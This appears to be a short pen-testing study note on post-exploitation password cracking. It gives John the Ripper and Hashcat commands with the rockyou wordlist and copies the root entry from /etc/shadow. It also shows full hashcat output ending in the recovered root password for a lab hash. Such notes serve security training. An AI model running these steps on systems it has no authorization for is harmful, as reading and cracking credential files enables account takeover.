November 12, 2019 · Hashcat John Basic Pen-Testing

12.2 : Post Exploitation - cracking passwords

John the ripper

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john --show windows

Google

Hashcat

cracking md5

hashcat -m 500 /usr/share/wordlists/rockyou.txt shadow.txt

cracking linux /etc/shadow

# check password encryption type
grep -rn ENCRYPT_METHOD /etc/login.defs
264:# This variable is deprecated. You should use ENCRYPT_METHOD.
278:ENCRYPT_METHOD SHA512
281:# Only used if ENCRYPT_METHOD is set to SHA256 or SHA512.

# get encryption mode, which is 1800
hashcat --help | grep SHA512
   1750 | HMAC-SHA512 (key = $pass)                        | Raw Hash, Authenticated
   1760 | HMAC-SHA512 (key = $salt)                        | Raw Hash, Authenticated
  12100 | PBKDF2-HMAC-SHA512                               | Generic KDF
   1711 | SSHA-512(Base64), LDAP {SSHA512}                 | HTTP, SMTP, LDAP Server
   1800 | sha512crypt $6$, SHA512 (Unix)                   | Operating Systems
   7100 | macOS v10.8+ (PBKDF2-SHA512)                     | Operating Systems
     X  | 2 = PBKDF2-HMAC-SHA512                           | Full-Disk Encryption (FDE)
     X  | 2 = PBKDF2-HMAC-SHA512                           | Full-Disk Encryption (FDE)


# grep root account password
cat /etc/shadow | head -n 1 > password.hash
root:$6$tAzBSeVJMYiOb6Go$dUX7g7mQkmN/9FjZQAtdjTe2F7ImqwrEJGyppTaUVNeqxqlj.pNCPyKvnLFfQMmvX1LUpqS9VR6jSu6WNH/sE0:18212:0:99999:7:::

hashcat -m 1800 password.hash /usr/share/wordlists/rockyou.txt  --force

Session..........: hashcat
Status...........: Running
Hash.Type........: sha512crypt $6$, SHA512 (Unix)
Hash.Target......: $6$tAzBSeVJMYiOb6Go$dUX7g7mQkmN/9FjZQAtdjTe2F7Imqwr...NH/sE0
Time.Started.....: Tue Nov 12 00:52:30 2019 (12 secs)
Time.Estimated...: Wed Nov 13 03:28:43 2019 (1 day, 2 hours)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:      150 H/s (10.21ms) @ Accel:128 Loops:64 Thr:1 Vec:4
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 1664/14344385 (0.01%)
Rejected.........: 0/1664 (0.00%)
Restore.Point....: 1664/14344385 (0.01%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:2752-2816
Candidates.#1....: kenzie -> divina

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

...upon completion

The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework

Approaching final keyspace - workload adjusted.

$6$tAzBSeVJMYiOb6Go$dUX7g7mQkmN/9FjZQAtdjTe2F7ImqwrEJGyppTaUVNeqxqlj.pNCPyKvnLFfQMmvX1LUpqS9VR6jSu6WNH/sE0:devdev